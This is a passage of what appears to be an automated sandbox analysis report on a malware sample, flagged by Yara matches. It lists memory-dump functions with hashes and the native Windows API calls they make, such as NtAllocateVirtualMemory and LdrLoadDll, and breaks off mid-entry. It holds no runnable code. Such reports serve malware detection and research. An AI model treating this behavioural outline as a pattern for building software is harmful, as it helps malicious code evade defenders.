                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 44501766209cb1526bd7f991488d313fc085467a2a3c982f2275319c923bce83
                                                          • Instruction ID: 7fd089a1cf5c5fbdd6a781c154ad963796b8c0c68f9476ba36e874287564e873
                                                          • Opcode Fuzzy Hash: 44501766209cb1526bd7f991488d313fc085467a2a3c982f2275319c923bce83
                                                          • Instruction Fuzzy Hash: 13E0863235031027E60921559C1BFB7B14ED7C1A50F14802AF9068E2C5CED26D064295
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1d29e950febe69f1f794d9e923472076f4fab6dc3279d25c7372351564a5c2a0
                                                          • Instruction ID: 07c794d5b3822444f43c4b63ac704aae0bf34e7a2928bf577348b62970ae890e
                                                          • Opcode Fuzzy Hash: 1d29e950febe69f1f794d9e923472076f4fab6dc3279d25c7372351564a5c2a0
                                                          • Instruction Fuzzy Hash: A2E0C9B4E082189BCB54DFE9D8416EDBBF5FB45304F4085AAC828A3345EB705A018B40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 55c13ffc31d250bf5bb7ea495019babdc60ad8bcc7ec8c58527d20367d894f78
                                                          • Instruction ID: 8213372b82e1cf50db2bd93566b508fc32d517d8778ea794f6f5ab94679abf1f
                                                          • Opcode Fuzzy Hash: 55c13ffc31d250bf5bb7ea495019babdc60ad8bcc7ec8c58527d20367d894f78
                                                          • Instruction Fuzzy Hash: 6BE08630A0110DEF8B40FFA4E9518ED77BDFB8520471045A9D80997704DB316E109F51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b779fa2d07c56d151dfbea7daaf89a01301d8bf8031255df3ed22a5c24eb4452
                                                          • Instruction ID: 7cfffd07253aedc4d83c4a84d6aa4159674d8da4532b9e9dcc361af987d08f34
                                                          • Opcode Fuzzy Hash: b779fa2d07c56d151dfbea7daaf89a01301d8bf8031255df3ed22a5c24eb4452
                                                          • Instruction Fuzzy Hash: 13E0C2307450408FC304DFA8E840A923BB9DF88621B1400AFF849CB3B2CA249D06EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52678529cb47f3f7a1af9d8215cbdba5444f52c11830c723ee547db9d8a7086a
                                                          • Instruction ID: 3db33fa2fb921a43b15b7fc5ae9888da87c558c0ef1a261bbebc20740940b36c
                                                          • Opcode Fuzzy Hash: 52678529cb47f3f7a1af9d8215cbdba5444f52c11830c723ee547db9d8a7086a
                                                          • Instruction Fuzzy Hash: 31D097037884D003D703E3BC29283CE2FD80FD3228F8B089C86C00656BE009819B830A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f3ef70864ccbbd86d90a40a6800578dfc1a46cfc32f140d1955f59fdf21718b4
                                                          • Instruction ID: e8e4a701b5ad627d80231c886d91d51cc55f1c6882d1bcbe7f0024899ebe683c
                                                          • Opcode Fuzzy Hash: f3ef70864ccbbd86d90a40a6800578dfc1a46cfc32f140d1955f59fdf21718b4
                                                          • Instruction Fuzzy Hash: AED0C931B141148FC704DB5DE4449953BEDEF8D66575000BAF50ACB3A1DEA1AD419B80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a54da2119323e3eb0abf176cde1a794da7244477f75c54303a67adab35b5b5e3
                                                          • Instruction ID: 42bf5fbd992cf29b5b53323e771a65eeefad4f51300546c968d20dd7caf3ef72
                                                          • Opcode Fuzzy Hash: a54da2119323e3eb0abf176cde1a794da7244477f75c54303a67adab35b5b5e3
                                                          • Instruction Fuzzy Hash: DCC08C3B1041005AC3049600D982BCEB7A0FF88208FAA9050A1C141522D734C916E702
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef713a727b1fd7ed1b0228c83e582a319d938344e401f26a13fc8d36708fecf7
                                                          • Instruction ID: ff20055767eef5cfdee901f42d1ba9e2b1a2a8037b6777c61943b9a4d05d8921
                                                          • Opcode Fuzzy Hash: ef713a727b1fd7ed1b0228c83e582a319d938344e401f26a13fc8d36708fecf7
                                                          • Instruction Fuzzy Hash: 36C04C35114508EBCB05AF55F90A8597F6AEB98261B14C122F84D46320DF71A959EAA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58f39c3163b68ad9c2748ffb984d6f3e08502546f816b295ac183208257435cc
                                                          • Instruction ID: 819ab4a8e3d292d50b07d7125d3bab9deacde199cf7e3abe52a55affa05c2be6
                                                          • Opcode Fuzzy Hash: 58f39c3163b68ad9c2748ffb984d6f3e08502546f816b295ac183208257435cc
                                                          • Instruction Fuzzy Hash: 0BC02B350401149F8700E740C184C677696FF46300780CC5171C102130CB30C914EB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 881bb0c0cf2dbdaf93294d065b1c3dd63a7cb1d04c66963a78708770b128dd96
                                                          • Instruction ID: 2410c78499b3ad895e137719224af466eebe4042ef0f72cf868801d5461d44c6
                                                          • Opcode Fuzzy Hash: 881bb0c0cf2dbdaf93294d065b1c3dd63a7cb1d04c66963a78708770b128dd96
                                                          • Instruction Fuzzy Hash: F7D1ED31C2074ACBC710EBA4D9606DDB7B5FF95200F618B9AE14A77214EF706AC9CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9298fffe63614dcb3db2477dac8a71c7e1ee8719b8bf2fcbdb7f2b2152f165b3
                                                          • Instruction ID: b024c1e28535f39b76eac92d14f83c84d4067ca8e2536caa60ade23a9dfdd873
                                                          • Opcode Fuzzy Hash: 9298fffe63614dcb3db2477dac8a71c7e1ee8719b8bf2fcbdb7f2b2152f165b3
                                                          • Instruction Fuzzy Hash: 34D1EB31C2074ACBCB10EBA4D960ADDB7B5FF95200F518B9AE14A77214EF706AC8CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          APIs
                                                          • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: A:A
                                                          • API String ID: 2738559852-2859176346
                                                          • Opcode ID: 5ff3e8a474b7103c28a3510f9a6ba99d49f4041b8fe7ef7a0f96af359f036fa7
                                                          • Instruction ID: 76438851091ddfda0411e6d30fa345e03d2d82d961f81e623d2dccdef5b78a76
                                                          • Opcode Fuzzy Hash: 5ff3e8a474b7103c28a3510f9a6ba99d49f4041b8fe7ef7a0f96af359f036fa7
                                                          • Instruction Fuzzy Hash: 0F0114B2200119AFCB14DF99CC85EEB77A9FF8C350F118659FA1D97251DA30E945CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: A:A
                                                          • API String ID: 2738559852-2859176346
                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                          • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                                          • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                          • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: af5bad9fe7ab8d35f612e42bf070246de5f4355e4d4b89a0963767d269507eb2
                                                          • Instruction ID: 6d56f82890d68c20edb7195de3d4a6e42b6164b1a5d8c9bf2a25451d1f19e804
                                                          • Opcode Fuzzy Hash: af5bad9fe7ab8d35f612e42bf070246de5f4355e4d4b89a0963767d269507eb2
                                                          • Instruction Fuzzy Hash: 4FF05EB1600108AFCB18CF99CC91EEB77A9FF88344F108259FE0897241C630E815CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bad0ff05137418b64c42b86367529988bf70abdb93236c477866ac7c7f041382
                                                          • Instruction ID: 265114da11572675a009b4c60de04f7c5209ed21241de56456dd5cc878fff7ac
                                                          • Opcode Fuzzy Hash: bad0ff05137418b64c42b86367529988bf70abdb93236c477866ac7c7f041382
                                                          • Instruction Fuzzy Hash: D79002B160100402D54571D956047460005A7D0341F51C015A5055558EC7D98DD576A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: dcf73ab426b28c8d3f8806f65fc9a9fc06209ce2fa0aaecf9b931409b7830c57
                                                          • Instruction ID: eef160581ece5b6be39f329254e7ca12e782575019b5e42257213824cc635a55
                                                          • Opcode Fuzzy Hash: dcf73ab426b28c8d3f8806f65fc9a9fc06209ce2fa0aaecf9b931409b7830c57
                                                          • Instruction Fuzzy Hash: 6D90027561100003050AA5D917045070046A7D5391351C025F1006554CD7E188616161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b89eb39028ab5688f1c13e5ebfeed3a169d6bf664db608fb19342296e5f9d237
                                                          • Instruction ID: 1a25c1cd16a0f53fcd72a902df21b4954b81522da5dc6dd3ad8e1f5b08c02d70
                                                          • Opcode Fuzzy Hash: b89eb39028ab5688f1c13e5ebfeed3a169d6bf664db608fb19342296e5f9d237
                                                          • Instruction Fuzzy Hash: A99002B174100442D50561D95614B060005E7E1341F51C019E1055558DC7D9CC527166
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bd2160619b82b92714bb2e10b999cb03e34529efa7192ef7415b4f0e3fcaed10
                                                          • Instruction ID: 130cf6fc6214e052c402c45bf80025f77f0b1ee50206669c17a22e58264cf936
                                                          • Opcode Fuzzy Hash: bd2160619b82b92714bb2e10b999cb03e34529efa7192ef7415b4f0e3fcaed10
                                                          • Instruction Fuzzy Hash: 739002B160200003450A71D95614616400AA7E0341B51C025E1005594DC6E588917165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a079af71d39ca0d1c7fa066df97dba45dcbd574263a389df9a64a94053acb7ca
                                                          • Instruction ID: 12d67d3d0da063a5779bd8177e8d1d94c4a6225134e3b3ba30625b12f43570b1
                                                          • Opcode Fuzzy Hash: a079af71d39ca0d1c7fa066df97dba45dcbd574263a389df9a64a94053acb7ca
                                                          • Instruction Fuzzy Hash: 6A90027164204152594AB1D956045074006B7E0381791C016A1405954CC6E69856E661
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: c40ff2ce8562ae2d7a663e391c8ba0778b54205705c6d283900e1edfe2a0eb40
                                                          • Instruction ID: bdadd4f54973eeff8de63a5ac9665d15b518fae19f28cb2be87a7c9b53f86656
                                                          • Opcode Fuzzy Hash: c40ff2ce8562ae2d7a663e391c8ba0778b54205705c6d283900e1edfe2a0eb40
                                                          • Instruction Fuzzy Hash: 4290027160100413D51661D957047070009A7D0381F91C416A041555CDD7D68952B161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 78a6abfc8e95a8e96bfac8645358cde481a3ca74c4aea027fa29cfb8d109ac2e
                                                          • Instruction ID: d2d954934aa6753a116697e5796cbca5cb7651a7201f10ca7ca7bd56da468612
                                                          • Opcode Fuzzy Hash: 78a6abfc8e95a8e96bfac8645358cde481a3ca74c4aea027fa29cfb8d109ac2e
                                                          • Instruction Fuzzy Hash: A2900271A0100502D50671D95604616000AA7D0381F91C026A1015559ECBE58992B171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 12c26b61616d292c9640572a4f45e45c60306d9ce40f5c2f4f573c19b6abc390
                                                          • Instruction ID: 325e81858735b0ecf23ace190357220518b4a77dabfe72e4ea435a705170d1d7
                                                          • Opcode Fuzzy Hash: 12c26b61616d292c9640572a4f45e45c60306d9ce40f5c2f4f573c19b6abc390
                                                          • Instruction Fuzzy Hash: 0F90027160100402D50565D966086460005A7E0341F51D015A5015559EC7E588917171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: eb04b1d59912049d0041b43981a53974c69542ae562f15913f7d90426611401c
                                                          • Instruction ID: 2ddf1da5be036aaa7ab78c0894adc860af4ac6471e52a2f9e8fe41a8635ad593
                                                          • Opcode Fuzzy Hash: eb04b1d59912049d0041b43981a53974c69542ae562f15913f7d90426611401c
                                                          • Instruction Fuzzy Hash: 8090027961300002D58571D9660860A0005A7D1342F91D419A000655CCCAD588696361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6b88498f1a6ad8df49e8bd186f8944e2ebe410dbebea146153cb51c9850f1f7a
                                                          • Instruction ID: 99567f19d8ff02331ab08ad1ac29ce06fc1cd0fc7bf732713824fcea3f9ddb8f
                                                          • Opcode Fuzzy Hash: 6b88498f1a6ad8df49e8bd186f8944e2ebe410dbebea146153cb51c9850f1f7a
                                                          • Instruction Fuzzy Hash: E790027170100003D54571D966186064005F7E1341F51D015E0405558CDAD588566262
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 96eab8f2331156addbe6b6a5f6e38e7a7957547c2a10f054a37cbceaf74e250f
                                                          • Instruction ID: f1ad5182df541f9e4de8a74b4f3b0a960598465730aa2632b35eda3e7bc0384e
                                                          • Opcode Fuzzy Hash: 96eab8f2331156addbe6b6a5f6e38e7a7957547c2a10f054a37cbceaf74e250f
                                                          • Instruction Fuzzy Hash: 5790027171114402D51561D996047060005A7D1341F51C415A081555CDC7D588917162
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6312dc9d86751c55430c2eff1505241c6498c6d8b143a8f03d4da1bcc747527a
                                                          • Instruction ID: 237fc09feb6f535907aee1aa9db64dd4a9a3cc92b0d28313b6ee670c61450b88
                                                          • Opcode Fuzzy Hash: 6312dc9d86751c55430c2eff1505241c6498c6d8b143a8f03d4da1bcc747527a
                                                          • Instruction Fuzzy Hash: B990027160140402D50561D95A1470B0005A7D0342F51C015A1155559DC7E5885175B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2f4c3fc75c87b8b2d67dd8291fa5e6d3b515325cc8c2cfed96653a01a7aa56bf
                                                          • Instruction ID: 132870921965155216ed62baad54e00de34344280f271b39aa2e93e3b7663e54
                                                          • Opcode Fuzzy Hash: 2f4c3fc75c87b8b2d67dd8291fa5e6d3b515325cc8c2cfed96653a01a7aa56bf
                                                          • Instruction Fuzzy Hash: E2900271A0100042454571E99A449064005BBE1351751C125A0989554DC6D9886566A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: c509421b81adfde94b524689cee8de9417b4c9d25b269558399c21100d0ae8ac
                                                          • Instruction ID: f687567509220d6472929e8fa923be0f77c1fde09609f50bd035caf3a21340c5
                                                          • Opcode Fuzzy Hash: c509421b81adfde94b524689cee8de9417b4c9d25b269558399c21100d0ae8ac
                                                          • Instruction Fuzzy Hash: 9E90027161180042D60565E95E14B070005A7D0343F51C119A0145558CCAD588616561
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d1da726b3211757d10a6c261e05a6945b3b92d5b0aa76a12ff2cc0c141f55dd2
                                                          • Instruction ID: 7b3aa78926149baec460cf22497976ad43f66a22c1fcca9d860c5295394e9c30
                                                          • Opcode Fuzzy Hash: d1da726b3211757d10a6c261e05a6945b3b92d5b0aa76a12ff2cc0c141f55dd2
                                                          • Instruction Fuzzy Hash: F790027160100802D58571D9560464A0005A7D1341F91C019A0016658DCBD58A5977E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: abe3bb2be54b12107b4e25728a62721550012e299fea4fe33af66f4f8c5d84b4
                                                          • Instruction ID: 6d695e16418302ebb9531eab95ecc135a76dc941f60381eff3f7fb45b2003605
                                                          • Opcode Fuzzy Hash: abe3bb2be54b12107b4e25728a62721550012e299fea4fe33af66f4f8c5d84b4
                                                          • Instruction Fuzzy Hash: 8F90027160108802D51561D9960474A0005A7D0341F55C415A441565CDC7D588917161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                          • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                                          • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                          • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: F5A
                                                          • API String ID: 1279760036-683449296
                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                          Memory Dump Source
